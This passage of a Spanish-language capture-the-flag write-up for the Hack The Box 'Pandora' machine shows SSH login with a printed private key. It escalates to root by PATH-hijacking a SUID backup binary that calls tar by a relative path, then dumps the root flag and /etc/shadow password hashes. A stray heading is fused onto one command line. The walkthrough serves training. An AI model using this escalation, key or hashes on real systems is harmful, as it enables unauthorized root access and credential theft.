sCjDQihTFuGqvTtofMsjskmrs2idn15sVTyFT0bFAAAFiOIWyTviFsk7AAAAB3NzaC1yc2
EAAAGBAMdurWSInVRNRYBbrP/iV+tljBJ0Q+KzHCuZmZLxCuD/0iYDtN2C/5J6bU/hY1px
av57+B25bRSPTBT/+xkdaNgSr7n+3tG/xGOBKYmwAk5KoaKXI5Fl7K4ztX3mKkpdrgrJcv
Ke0zWBBb8/uW57D14Te3JqW3MYeS1oz6b3lILbyzOF8lNOLKlfYFIytIH7ml6u3HtOCbZO
rN2mBVMtM3IjOLLdUCKP2zCPtkTlcLTZfymJ4IYdba2pNqZkS/ef/xVOeMXUSz7kt8vwTT
pOWSTOmeSVRCI/o23GU+a7bvtKOnsan03xOkGgDwxVZB4YfMMBu4zav6626fGf1KWZqxnp
m/vrDqaJDbaNYSmw41DcJMmREjPmDXkIfB1WJ16T0l/0n44tSYsvtYXhyNAimcWDP3WCGv
wlY/37iV96U95jrz9ZrKEcn8e8wPEHAVgjc8PbVuAbDVTUK/dP2elZeifcBbAow0IoUxbh
qr07aHzLI7JJq7NonZ9ebFU8hU9GxQAAAAMBAAEAAAGBAIcTK1WAQi8q9vvtG8tkHnBNIw
YMwT32Wgodyqp/oAKswkUFFadCZp9rVEZaPdSwJOugQ3i+cmcOd1Vx2zwzcyOF5IdxXLFr
1TQf82ZSU/17Bub8vxZnllqWo0JWdiZQNOURdE1nzV3buWzDWHC/4LSzNVVVPANEfC6JYr
uPzIKlI4gOHQbXV+CPvMlvllrDctbWUHcjb+iOeP7Wx5yCbOnNeUWMKA6AqNDHRYh8bk3P
UhVsUSoFHJgWl/Ey1VEuh4BlcG+G6UNXRr9vuC+D1NYm5LfNKtwK/GW2wgY3vQzSVDhFT5
5EAQO9YKqIs3DaWnBJbeKPRE3r3AVGT0fhfYpmuSWFT+oj/Vw8LqUmqvgDv2vWtcoxwSM6
yqaZik1Q1dnCAKdF5AYdYTFklGMKsbQ1elr2ukmXfzFJoWgQVoE92OgCE1CZj8YJ0Ijpkd
7Ftr8AMn61Kt58UJaYhl/zrZfcir89MIVPL4b/OA1ognalsfrpUnoDwDB78oK8leggsQAA
AMEAqZwwvaLQU9rTxrkb5nCm45IK/uRrYg2yR/KpClC3hBLlNVNwKD/LTgYyvhK41N3Ezj
BZBc0L0csOYzaHJQAloPqQueDB7TuFQ4L501SbBFmH858M6tMx0GzD2t7JzVBSVwYi9h9l
NuSwr2ht4Em8KCArQ5obOGZs4juxkmb1ayhG9ZAh12lfMOKTqzllkEzXaQstKciKy20vd4
POdBsoNIDh7caLoQmgnr3UjaYmLUffxrSjH1cEraxD0R8B/yvRAAAAwQDlcaMSAJF/s0pc
Pb5TglKXp3gccDGTIkBXuxcf7XQ32HahIgBibe/ueVTE+z3UkWlrUTrvsXN7fX3bGXAjtF
0RcZNcPyqQKQnneHOaRD7vFUe91M1CezluSreVWXa6j6teFQmO+ZSyEGPPDZQIenJsk9cQ
HKHMlwPlqz5peh+ULJetomP88U0RHJz+EQrL3eSZsWJg1QALPlb/MjCnoBymNx+d+h2rqM
K+SJN9+Sei0fz4B2+M7Udk52Pe38ViAZ8AAADBAN6Dzjjwz7gJ2gIDBq6H5mGfZhMQIh+z
16yfQGSQvBqgeXAe0v1ky/+yIhFogqXRSyeu2hmLWUYGW9FNuzBu/0xWVQE3ovFfWUeEhU
eCgtjGkRqmIu8FTd2AtyqCWSsjWMyJuy1fPgSlYP49wtHb2QKpJaGII6qBVjGXxN9WMRjk
GXM/TeK6ZZA0vO3N4Csy0XY01cxZoO7V2sQQquRT5ceII6rVBiQ83Z2bAtPArH9m+wfkFM
Zcu/ZuzZjbKm8FGwAAAAxtYXR0QHBhbmRvcmEBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
Y podemos conectarnos
❯ nano id_rsa
❯ chmod 600 id_rsa
❯ ssh -i id_rsa matt@10.10.11.136
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 21 Jun 17:39:43 UTC 2023
System load: 0.0
Usage of /: 63.2% of 4.87GB
Memory usage: 14%
Swap usage: 0%
Processes: 246
Users logged in: 1
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:493f
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$
matt@pandora:~$ export TERM=xterm
Ahora si ejecutamos el pandora_backup hace un backup de muchas rutas del sistema pero al final nos dice esto
matt@pandora:~$ pandora_backup
Backup successful!
Terminating program!
matt@pandora:~$ pandora_backup
El propietario es root y es SUID
matt@pandora:~$ ls -l /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup
matt@pandora:~$
Lo que podemos hacer es tratar de inyectar un comandos pero sabemos que esto es un binario
matt@pandora:~$ file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:~$
Esta usando tar pero vemos que el binario lo esta poniendo de forma relativa debería ser absoluta para evitar poder hacer un PATH Hijacking
Esta seria la forma correcta
matt@pandora:~$ which tar
/usr/bin/tar
matt@pandora:~$
matt@pandora:~$ ltrace /usr/bin/pandora_backup
getuid() = 1000
geteuid() = 1000
setreuid(1000, 1000) = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
) = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
) = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
) = 39
+++ exited (status 1) +++
matt@pandora:~$
Este es nuestro PATH
matt@pandora:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:~$
Vamos a manipular todo esto
Lo que vamos a hacer es que nos de una Bash como root ya que root es la persona que esta ejecutando el binario al crearnos un archivo llamado tar le vamos a decir que el PATH comience desde donde nosotros le indiquemos que es en esta ruta para que tome nuestro tar y no el /usr/bin/tar que esa es su ruta absoluta pero aprovechándonos de que en el binario no se esta haciendo de manera correcta la llamada a /usr/bin/tar es por eso que podemos alterar esto
matt@pandora:~$ cd /tmp
matt@pandora:/tmp$ touch tar
matt@pandora:/tmp$ chmod +x tar
matt@pandora:/tmp$ nano tar
matt@pandora:/tmp$ cat tar
/usr/bin/sh
matt@pandora:/tmp$
Ahora el PATH comienza en tmp y como va buscar el tar y el tar lo tenemos en tmp pues como hay lo va a encontrar va a ejecutar el de nosotros y no va a llegar ala ruta donde si esta el tar correcto gracias a esto ejecutara la instrucción que indicamos que es darnos una sh
matt@pandora:/tmp$ export PATH=/tmp:$PATH
matt@pandora:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/tmp$
Shell as root && root.txt
Ahora si ejecutamos funciona ya que cuando ejecutes cualquier comando va a comenzar a buscar desde tmp así adelante y como tar esta en tmp que es el de nosotros pues listo hay lo encuentra y ejecuta lo que le dijimos
matt@pandora:/tmp$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
# whoami
root
#
# bash
root@pandora:/tmp# cd /root
root@pandora:/root# cat root.txt
fb3d15aa14335548d163287b9e5b5161
root@pandora:/root#
hashes de las contraseñas de los usuarios
root@pandora:/root# cat /etc/shadow### Unauthenticated SQL Injection
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18789:0:99999:7:::
sshd:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7:::
lxd:!:18789::::::
Debian-snmp:!:18789:0:99999:7:::
mysql:!:18789:0:99999:7:::
daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7:::
root@pandora:/root#